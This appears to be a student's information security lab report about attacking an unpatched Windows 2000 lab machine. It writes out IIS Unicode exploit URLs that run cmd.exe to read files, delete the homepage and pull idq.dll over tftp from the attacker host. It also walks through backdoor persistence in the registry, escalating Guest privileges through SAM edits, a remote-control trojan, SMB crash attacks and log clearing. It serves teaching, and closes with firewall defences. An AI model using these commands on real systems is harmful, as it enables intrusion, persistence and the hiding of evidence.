《中南大学信息安全工程实验报告.docx》由会员分享,可在线阅读,更多相关《中南大学信息安全工程实验报告.docx(7页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、信息安全工程实验报告学院: 信息科学与工程学院 班级: 学号: 姓名: 目录 实验一3实验二7实验三10实验四13实验六18实验七24实验八29总结35 实验一一 配置VM虚拟机1、先查看主机的ip地址 为10.96.26.2052、将虚拟机的ip地址设置成和主机同一网段的3、在主机对虚拟机ping 测试两者是否连通 经测试 两者连通4、打开wireshark,设置过滤项源ip和目的ip :ip.dst=10.96.94.25&ip.src=10.96.80.155设置只抓tcp下的ftp和telnet协议:tcp.port=21|tcp.port=23抓取udp和icmp:udp|icmp先
2、ping虚拟机,然后开始抓包,ping完后,停止抓包,抓包数据如下二 开启telnet服务1、分别在主机和虚拟机上开启telnet服务主机的telnet在服务选项开启 在主机的DOS窗口下Telnet虚拟机192.168.31.128为虚拟机的地址2、输入服务器的用户名和密码,显示telnet虚拟机成功 实验二一、系统用户的扫描1、对ip地址为169.254.168.201的计算机进行扫描2、得到对方机器的用户列表可选择一个用户对其进行字典测试或穷举测试,字典测试需选择一个字典文本,穷举测试可以设置穷举所包含的内容。选择administrator进行字典测试,得到密码为111二、端口扫描使用工
3、具Portscan对ip地址为10.96.94.25的主机进行扫描,得到目标主机的所有开放端口三、 共享目录扫描通过工具软件Shed来扫描对方主机,得到对方计算机提供了哪些目录共享。在这里起始ip和目标ip都添目标主机ip点击可共享文件夹客队目标主机内的文件进行操作四、 利用tcp协议进行端口扫描实现端口扫描的程序可以使用TCP协议和UDP协议,原理是利用Socket连接对方的计算机的某端口,试图和该端口建立连接,如果建立成功,就说明对方开放了该端口,如果失败了,就说明对方没有开放该端口,以下为探测ip为10.96.78.201的23号端口是否开放的结果 实验三一 漏洞扫描1、 使用xscan
4、对windows 2000进行扫描,设置扫描参数及模块,扫描ip为10.96.44.230的主机2、 开始进行漏洞扫描二 网络监听 使用win sniffer可截取局域网内的密码,由于我的电脑不能运行win sniffer,下面我们来了解一下基本使用方法1、 点击工具栏Adapter,设置为本机的物理网卡2、 使用dos命令进行远程FTP服务3、 win sniffer已经记录下了刚才会话记录三 得到管理员密码环境:windows2000所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,将FindPass.exe拷贝到C
5、盘根目录,在DOS界面下执行该程序,将得到当前用户得登录名四 普通用户建立管理员账号环境:windows 2000利用工具GetAdmin.exe可以在用普通用户帐号登录后,将自己加到管理员组或者新建一个具有管理员权限的用户。执行程序GetAdmin.exe,程序自动读取所有用户列表,点击按钮“New”,输入要新建的管理员组的用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,添加成功。 实验四一 office文档暴力破解1、设置word权限密码在工具选项安全性中设置密码为999保存并关闭该文档,然后打开,就需要输入密码2、 使用工具软件Advanced Offi
6、ce XP Password Recovery可以快速破解Word文档密码,点击工具栏按钮“Open File”,打开刚才建立的Word文档,程序打开成功后会在Log Window中显示成功打开的消息二 利用Unicode漏洞对对方主机进行操作1、使用X-Scan对目标主机10.96.44.230进行IIS扫描,Unicode漏洞属于IIS漏洞可以看出,存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。2、 在浏览器中输入 http:/10.96.44.230/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c: 有Uni
7、code的主机ip %c0%2f”就是“/”的Unicode编码这条语句是执行dir命令列出目录结构。结果可以看到ip地址为10.96.44.230下的目录结构3、 用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件。http:/10.96.44.230/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.ini4、 更改对方主页,已经知道对方网站的根路径在“C:Initpubwwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”(IIS默认启动页面)来删除主页htt
8、p:/10.96.44.230/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp5、将cmd.exe文件拷贝到scripts目录,并改名为c.exehttp:/10.96.44.230/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:http:/10.96.44.230/scripts/c.exe?/c+dir+c
9、: 实验五一 利用Unicode漏洞入侵系统 1、 使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序2、这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。在浏览器中执行命令:http:/10.96.44.230/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+10.96.78.200+get+idq.dll传送成功3、下面使用工具软件ispc.exe入侵对方系统。拷贝ispc.exe文件到本地计算机的C盘根
10、目录,在DOS命令行下执行命令: ispc.exe 10.96.44.230/scripts/idq.dll连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限但是这一步存在问题,说它没有idq.dll,不知道是什么问题二 其他漏洞攻击1、打印漏洞:利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。使用工具软件cniis.exe对ip地址为10.96.44.230的主机进行操作cniis 10.96.44.230 0 0表示该操作系统未打补丁2、 SMB致命攻击SMB(Session Message Block,会话消息块协议)又叫做NetBIOS或LanManager协
11、议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的SMB会话包,然后利用SMB会话包登录对方的计算机。下面介绍利用SMBdie让对方操作系统系统重新启动或者蓝屏。(1)攻击时输入对方的IP和对方的计算机名(2) 点击kill,对方计算机会蓝屏或重启 实验六一 远程启动Telnet服务1、分别在主机和虚拟机上开启telnet服务主机的telnet在服务选项开启 在主机的DOS窗口下Telnet虚拟机192.168.31.128为虚拟机的地址2、输入服务器的用户名和密码,
12、显示telnet虚拟机成功二 记录管理员口令修改过程首先在对方操作系统中执行Win2KPass.exe文件,当对方主机管理员密码修改并重启计算机以后,就在Winnttemp目录下产生一个ini文件。该程序执行完后会自己删除自己。三 建立Web服务和Telnet服务1、 使用工具软件wnc.exe开启两个服务Web服务和Telnet服务。在对方的命令行下执行wnc.exe,执行完毕后,利用命令“netstat -an”来查看开启的808(Web服务)和707(Telnet服务)端口2、 测试Web服务在浏览器地址栏中输入“http:/10.96.44.230:808”,出现主机的盘符列表3、 利
13、用“telnet 10.96.44.230 707”命令,不用任何的用户名和密码就可以登录对方主机4、 将wnc.exe加到自启动列表(1)在dos下执行reg.exe add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v service /d wnc.exe(2)查看一下对方的注册表的自启动项,已经被修改四 让禁用的Guest具有管理权限直接使用“regedit”命令打开注册表,该键值是隐藏的。可以利用工具软件psu.exe得到该键值的查看和编辑权1、使用进程管理器查看winlogon的PID为196,执行命令“psu -p regedit
14、 -i pid”其中pid为Winlogon.exe的进程号2、执行完命令以后,自动打开了注册表编辑器,查看SAM下的键值3、在Windows 2000操作系统上,Administrator一般为0x1f4,guest一般为0x1f5 。根据“0x1f4”和“0x1f5”找到Administrator和guest帐户的配置信息拷贝000001F4下的键值全部覆盖到“000001F5”目录下的“F”键值中4、 Guest帐户已经具有管理员权限了。为了能够使Guest帐户在禁用的状态登录,下一步将Guest帐户信息导出注册表。选择User目录,然后选择菜单栏“注册表”下的菜单项“导出注册表文件”,
15、将该键值保存为一个配置文件5、 分别删除Guest和“00001F5”两个目录,刷新对方主机的用户列表,会出现用户找不到的对话框。然后再将刚才导出的信息文件,再导入注册表。再刷新用户列表就不在出现该对话框了。再查看一下计算机管理窗口中的Guest帐户,发现该帐户是禁用的6、 注销退出系统,然后用用户名:“guest”,密码:“123456”登录系统 实验七一 使用“冰河”进行远程控制1、 在被控制端运行冰河服务器端程序将win32.exe传到被攻击主机,在DOS下运行该程序,执行完win32.exe文件以后,系统没有任何反应,其实已经更改了注册表,并将服务器端程序和文本文件进行了关联,当用户双
16、击一个扩展名为txt的文件的时候,就会自动执行冰河服务器端程序2、在本机进行操作,在出现的对话框中选择服务器端程序win32.exe进行配置,并填写访问服务器端程序的口令,这里设置为“1234567890”。2、 目标主机中了冰河了,可以利用客户端程序来连接服务器端程序,填写被攻击端IP点击按钮“确定”以后,可以在对方计算机上进行任意的操作。除此以外还可以查看并控制对方的屏幕等等二 清除日志1、 (1)清除IIS日志当用户访问某个IIS服务器以后,无论是正常的访问还是非正常的访问,IIS都会记录访问者的IP地址以及访问时间等信息。这些信息记录在WinntSystem32logFiles目录下。
17、(2) 打开任一文件夹下的任一文件,可以看到IIS日志的基本格式,记录了用户访问的服务器文件、用户登的时间、用户的IP地址以及用户浏览器以及操作系统的版本号。(3) 使用工具软件CleanIISLog.exe清除,首先将该文件拷贝到日志文件所在目录,然后执行命令“CleanIISLog.exe ex160505.log 192.168.1.34”,第一个参数ex160505.log是日志文件名,文件名的后六位代表年月日,第二个参数是要在该Log文件中删除的IP地址,也就是自己的IP地址。先查找当前目录下的文件,然后做清除(4) 结果如下2、 清除主机日志(1) 可以在计算机上通过控制面板下的“
18、事件查看器”查看日志信息(2)使用工具软件clearel.exe,可以方便的清除系统日志,首先将该文件上传到对方主机,在dos下执行以下命令Clearel System 系统日志Clearel Security 安全日志Clearel Application 应用程序日志Clearel All执行完毕后,打开事件查看器,发现日志被清空 实验八一 脚本病毒(VBS)1、 将病毒代码放在记事本中,保存为.vbs格式。代码目的感染HTML文件2、 点击html文件,显示如下二 用WinRoute防止主机被pingWinRoute目前应用比较广泛,既可以作为一个服务器的防火墙系统,也可以作为一个代理服
19、务器软件。1、 利用WinRoute创建包过滤规则,创建的规则内容是:防止主机被别的计算机使用“Ping”指令探测。选择菜单项“Packet Filter”,此时里面还没设置任何规则,点进去设置一条ICMP规则设置完毕,记得接下来点应用2、 设置完毕,此时外界对此机的ping命令都不会得到相应3、 虽然此机对外界Ping无响应,但WinRoute已经将事件记录到安全日志了。选择菜单栏“View”下的菜单项“LogsSecurity Logs”。三 用WinRoute禁用FTP访问1、 创建访问规则FTP服务用TCP协议, FTP占用TCP的21端口,主机的IP地址是“10.96.44.230”
20、2、 设置访问规则以后,再访问主机“10.96.44.230”的FTP服务,将遭到拒绝3、 访问违反了访问规则,会在主机的安全日志中记录下来FT四 用WinRoute禁用HTTP访问HTTP服务用TCP协议,占用TCP协议的80端口,主机的IP地址是10.96.44.2301、 利用WinRoute建立访问规则2、 打开本地的IE连接远程主机的HTTP服务,将遭到拒绝3、 访问违反了访问规则,所以在主机的安全日志中记录下来总结 通过信息安全工程的八个实验,我将这个学期所学的内容进行了实践操作,了解了如何对网络上的计算机进行攻击以及防御的操作。这其中包括用sniffer抓包,设置过滤,选取tcp等包进行分析,对远程主机进行Telnet操作等等。并学会了使用包括Winroute在内的各种工具。我了解到要进行一次成功的计算机攻击,需要做到以下五步操作:隐藏IP、踩点扫描、获得系统或管理员权限、种植后门、在网络中隐身。我们所做的实验主要是进行后四个步骤。我们是对没有打任何补丁的windows 2000 server进行操作,这个操作系统包含了包括Unicode在内的一些漏洞,便于我们的实验攻击。虽然我们现在的操作系统已经对各种漏洞打了补丁,但通过这几次的实验,我明白了只有想不到,没有做不到,所以我们在日常生活中也应对我们的操作系统进行相应的安全设置,及时查看本机的日志,防止黑客的入侵。